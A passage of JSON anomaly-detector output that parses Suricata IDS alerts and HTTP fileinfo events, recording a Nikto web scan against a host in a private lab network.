"/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.345338 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46940 -> 192.168.10.154:80", "/parser/model/time": 1583349514.345338, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46940, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.345338 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46940 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.Htm", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.345637+0000\",\"flow_id\":1697602987508313,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Htm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.345637, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1697602987508313,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Htm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Htm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.Htm\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.Htm\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.Htm", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.Htm", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46940, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1697602987508313,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1697602987508313, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.345637+0000\",\"flow_id\":1697602987508313,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46940,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.Htm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.347250 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46942 -> 192.168.10.154:80", "/parser/model/time": 1583349514.34725, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46942, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.347250 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46942 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.csc", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.347570+0000\",\"flow_id\":1217064866564597,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.34757, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1217064866564597,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.csc\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.csc\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.csc", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.csc", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46942, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1217064866564597,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1217064866564597, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.347570+0000\",\"flow_id\":1217064866564597,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46942,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.349169 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46944 -> 192.168.10.154:80", "/parser/model/time": 1583349514.349169, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46944, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.349169 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46944 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.el", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.349508+0000\",\"flow_id\":883960087990575,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.el\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.el\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.349508, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":883960087990575,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.el\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.el\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.el\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.el\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.el\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.el\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.el", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.el", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46944, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", 